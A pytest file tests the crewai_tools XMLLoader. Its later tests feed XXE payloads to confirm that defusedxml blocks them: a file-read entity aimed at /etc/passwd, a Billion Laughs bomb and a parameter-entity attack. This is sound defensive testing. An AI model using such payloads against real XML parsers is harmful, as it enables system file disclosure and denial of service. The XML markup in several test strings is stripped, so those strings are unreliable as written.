import os
import tempfile
from unittest.mock import patch
from crewai_tools.rag.base_loader import LoaderResult
from crewai_tools.rag.loaders.xml_loader import XMLLoader
from crewai_tools.rag.source_content import SourceContent
import pytest
class TestXMLLoader:
def test_parse_valid_xml_string(self):
loader = XMLLoader()
source = SourceContent("- Hello
- World
")
result = loader.load(source)
assert isinstance(result, LoaderResult)
assert "Hello" in result.content
assert "World" in result.content
assert result.metadata["format"] == "xml"
assert result.metadata["root_tag"] == "root"
def test_parse_xml_from_file(self):
xml_content = "Test TitleTest Body"
with tempfile.NamedTemporaryFile(
mode="w", suffix=".xml", delete=False, encoding="utf-8"
) as f:
f.write(xml_content)
temp_path = f.name
try:
loader = XMLLoader()
source = SourceContent(temp_path)
result = loader.load(source)
assert isinstance(result, LoaderResult)
assert "Test Title" in result.content
assert "Test Body" in result.content
assert result.metadata["format"] == "xml"
assert result.metadata["root_tag"] == "root"
finally:
os.unlink(temp_path)
def test_parse_invalid_xml_returns_raw_content(self):
loader = XMLLoader()
invalid_xml = ""
source = SourceContent(invalid_xml)
result = loader.load(source)
assert isinstance(result, LoaderResult)
assert result.content == invalid_xml
assert "parse_error" in result.metadata
assert result.metadata["format"] == "xml"
def test_parse_nested_xml(self):
loader = XMLLoader()
xml = (
""
"Nested text"
"Other text"
""
)
source = SourceContent(xml)
result = loader.load(source)
assert "Nested text" in result.content
assert "Other text" in result.content
def test_parse_xml_with_attributes(self):
loader = XMLLoader()
xml = '- First
- Second
'
source = SourceContent(xml)
result = loader.load(source)
assert "First" in result.content
assert "Second" in result.content
assert result.metadata["root_tag"] == "root"
def test_parse_empty_xml_elements(self):
loader = XMLLoader()
xml = "Content"
source = SourceContent(xml)
result = loader.load(source)
assert "Content" in result.content
assert result.metadata["format"] == "xml"
def test_doc_id_consistency(self):
loader = XMLLoader()
xml = "- Consistent
"
source = SourceContent(xml)
result1 = loader.load(source)
result2 = loader.load(source)
assert result1.doc_id == result2.doc_id
@patch("crewai_tools.rag.loaders.xml_loader.load_from_url")
def test_load_from_url(self, mock_load_url):
mock_load_url.return_value = "URL content"
loader = XMLLoader()
source = SourceContent("https://example.com/data.xml")
result = loader.load(source)
assert isinstance(result, LoaderResult)
assert "URL content" in result.content
mock_load_url.assert_called_once()
def test_xxe_entity_expansion_blocked(self):
"""Test that XML External Entity (XXE) attacks are blocked by defusedxml."""
loader = XMLLoader()
xxe_payload = (
''
"'
"]>"
"&xxe;"
)
source = SourceContent(xxe_payload)
result = loader.load(source)
# defusedxml should block the entity expansion and raise EntitiesForbidden,
# which is a subclass of ParseError, so _parse_xml catches it and returns
# raw content with a parse_error in metadata.
assert "parse_error" in result.metadata
assert result.metadata["format"] == "xml"
# The raw payload should NOT have resolved the entity
assert "/etc/passwd" not in result.content or result.content == xxe_payload
def test_xxe_billion_laughs_blocked(self):
"""Test that XML bomb (Billion Laughs) attacks are blocked by defusedxml."""
loader = XMLLoader()
billion_laughs = (
''
"'
' '
' '
"]>"
"&lol3;"
)
source = SourceContent(billion_laughs)
result = loader.load(source)
# defusedxml blocks entity expansion, resulting in a parse error
assert "parse_error" in result.metadata
assert result.metadata["format"] == "xml"
def test_xxe_parameter_entity_blocked(self):
"""Test that parameter entity attacks are blocked by defusedxml."""
loader = XMLLoader()
xxe_param = (
''
"'
" %xxe;"
"]>"
"test"
)
source = SourceContent(xxe_param)
result = loader.load(source)
assert "parse_error" in result.metadata
def test_xxe_file_from_file_blocked(self):
"""Test that XXE attacks via file loading are also blocked."""
xxe_content = (
''
"'
"]>"
"&xxe;"
)
with tempfile.NamedTemporaryFile(
mode="w", suffix=".xml", delete=False, encoding="utf-8"
) as f:
f.write(xxe_content)
temp_path = f.name
try:
loader = XMLLoader()
source = SourceContent(temp_path)
result = loader.load(source)
assert "parse_error" in result.metadata
assert result.metadata["format"] == "xml"
finally:
os.unlink(temp_path)
def test_defusedxml_is_used_not_stdlib(self):
"""Verify that the XMLLoader imports from defusedxml, not xml.etree.ElementTree."""
import crewai_tools.rag.loaders.xml_loader as xml_loader_module
assert "defusedxml" in xml_loader_module.fromstring.__module__
def test_arxiv_tool_uses_defusedxml(self):
"""Verify that ArxivPaperTool imports from defusedxml, not xml.etree.ElementTree."""
import crewai_tools.tools.arxiv_paper_tool.arxiv_paper_tool as arxiv_module
ET = arxiv_module.ET
assert "defusedxml" in ET.__name__